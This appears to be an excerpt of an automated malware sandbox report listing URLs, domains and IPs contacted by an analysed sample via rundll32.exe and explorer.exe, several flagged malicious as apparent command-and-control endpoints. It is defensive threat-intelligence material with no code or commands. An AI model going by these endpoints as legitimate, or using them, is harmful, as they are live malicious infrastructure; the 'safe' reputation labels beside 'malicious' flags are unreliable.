https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP | 0% | Avira URL Cloud | safe |
https://anikvan.com/api/azure== | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB | 0% | Avira URL Cloud | safe |
https://boriz400.com/ | 0% | Avira URL Cloud | safe |
https://altynbe.com/5~ | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azureure | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4 | 0% | Avira URL Cloud | safe |
https://altynbe.com/=~ | 0% | Avira URL Cloud | safe |
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php | 0% | Avira URL Cloud | safe |
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j | 0% | Avira URL Cloud | safe |
https://workspacin.cloud/live/ | 0% | Avira URL Cloud | safe |
https://anikvan.com/api/azure | 0% | Avira URL Cloud | safe |
https://altynbe.com/api/azurep | 0% | Avira URL Cloud | safe |
Domains and IPs
Name | IP | Active | Malicious | Antivirus Detection | Reputation
workspacin.cloud | 104.21.16.155 | true | true | | unknown
ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | 3.69.236.35 | true | false | | high
boriz400.com | 91.194.11.183 | true | true | | unknown
altynbe.com | 138.124.183.215 | true | true | | unknown
anikvan.com | 95.164.68.73 | true | true | | unknown
ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | 54.175.181.104 | true | false | | high
uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | unknown | unknown | false | | unknown
ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://illoskanawer.com/live/ | true | Avira URL Cloud: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure | true | Avira URL Cloud: safe | unknown
https://anikvan.com/content.php | true | Avira URL Cloud: safe | unknown
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure | true | Avira URL Cloud: safe | unknown
https://altynbe.com/content.php | true | Avira URL Cloud: safe | unknown
https://boriz400.com/api/azure | true | Avira URL Cloud: safe | unknown
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php | true | Avira URL Cloud: safe | unknown
https://altynbe.com/api/azure | true | Avira URL Cloud: safe | unknown
https://boriz400.com/content.php | true | Avira URL Cloud: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php | true | Avira URL Cloud: safe | unknown
https://workspacin.cloud/live/ | true | Avira URL Cloud: safe | unknown
https://anikvan.com/api/azure | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/odirmr | explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4 | rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure= | rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://altynbe.com/tyk.io | rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/ | rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://boriz400.com/api/azurey | rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure( | rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP | rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://anikvan.com/I~ | rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f | rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://anikvan.com/ | rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j | rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://anikvan.com/content.php.f | rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://wns.windows.com/L | explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4 | rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.com | explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://workspacin.cloud/live/0vaH | explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://altynbe.com/U~ | rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://altynbe.com/B_F | rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://workspacin.cloud/live/6 | explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F | rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://anikvan.com/content.phpGf | rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                                      high
                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://altynbe.com/content.php2frundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://anikvan.com/api/azuret.php.frundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLrundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://altynbe.com/rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://anikvan.com/drundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.phprundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://altynbe.com/api/azureontent.phpMfErundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1jrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://outlook.com_explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  low
                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://workspacin.cloud/live/J5explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpArundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgFrundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.phprundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&jrundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://boriz400.com/qarundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://workspacin.cloud/explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://altynbe.com/Xrundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
